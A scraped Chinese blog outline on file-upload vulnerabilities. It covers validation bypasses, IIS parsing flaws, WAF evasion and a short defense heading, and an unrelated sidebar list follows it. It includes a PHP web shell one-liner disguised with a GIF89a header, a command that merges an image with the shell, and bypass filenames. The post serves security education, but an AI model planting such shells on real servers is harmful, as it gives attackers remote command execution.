当前位置:网站首页>浅谈网络安全之文件上传
浅谈网络安全之文件上传
2022-07-06 15:35:00 【InfoQ】
概述
漏洞成因及危害
1.本地验证(前端验证)
2.后端验证及绕过
2.1 后缀名
3.文件类型验证
3.1 文件头检测:文件头内容信息(如gif89a)
JPEG 0xFFD8FF
PNG0 x89504E470D0A1A0A
GIF 47 49 4638 39 61(GIF89a)
GIF89a
<?php echo`$_REQUEST[cmd]`;
?>
cmd命令: copy 1.jpg/b+a.txt test.php
3.2 Content-Type检测
4. 内容及其他
4.1 逻辑安全:条件竞争(相当于系统占用)
4.2 目录命名
5.其他漏洞
脚本函数漏洞-cve
CVE-2017-12615
CVE-2015-5254
CVE-2019-2618
6.中间件解析漏洞
6.1 IIS 6.0+解析漏洞
image/aa.jpg
image.asp/aa.jpg aa.jpg
image.asp;.jpg或xxx.asp;xxx.jpg
7.WAF绕过
7.1 数据溢出(垃圾数据填充)
7.2 符号变异('";)
x.jpg;.php
7.3数据截断(%00;换行)
x.\np\nh\np
7.4 重复数据
8.防御
边栏推荐
猜你喜欢
ACL 2022 | 序列标注的小样本NER:融合标签语义的双塔BERT模型
Rust knowledge mind map XMIND
Matlab tips (27) grey prediction
DR-Net: dual-rotation network with feature map enhancement for medical image segmentation
新手程序员该不该背代码?
NPDP certification | how do product managers communicate across functions / teams?
CSDN 上传图片取消自动加水印的方法
CocosCreator+TypeScripts自己写一个对象池
Senior soft test (Information System Project Manager) high frequency test site: project quality management
Web APIs DOM 时间对象
随机推荐
UE4 blueprint learning chapter (IV) -- process control forloop and whileloop
Netxpert xg2 helps you solve the problem of "Cabling installation and maintenance"
Machine test question 1
2022-07-04 the high-performance database engine stonedb of MySQL is compiled and run in centos7.9
Balanced Multimodal Learning via On-the-fly Gradient Modulation(CVPR2022 oral)
Self made j-flash burning tool -- QT calls jlinkarm DLL mode
OpenSSL:适用TLS与SSL协议的全功能工具包,通用加密库
UDP编程
Use ECs to set up an agent
Dealing with the crash of QT quick project in offscreen mode
Sword finger offer question brushing record 1
Const keyword
extern关键字
POJ 1258 Agri-Net
How big is the empty structure?
[leetcode] 19. Delete the penultimate node of the linked list
Financial professionals must read book series 6: equity investment (based on the outline and framework of the CFA exam)
#DAYU200体验官# 首页aito视频&Canvas绘制仪表盘(ets)
Comparison between variable and "zero value"
On the problems of born charge and non analytical correction in phonon and heat transport calculations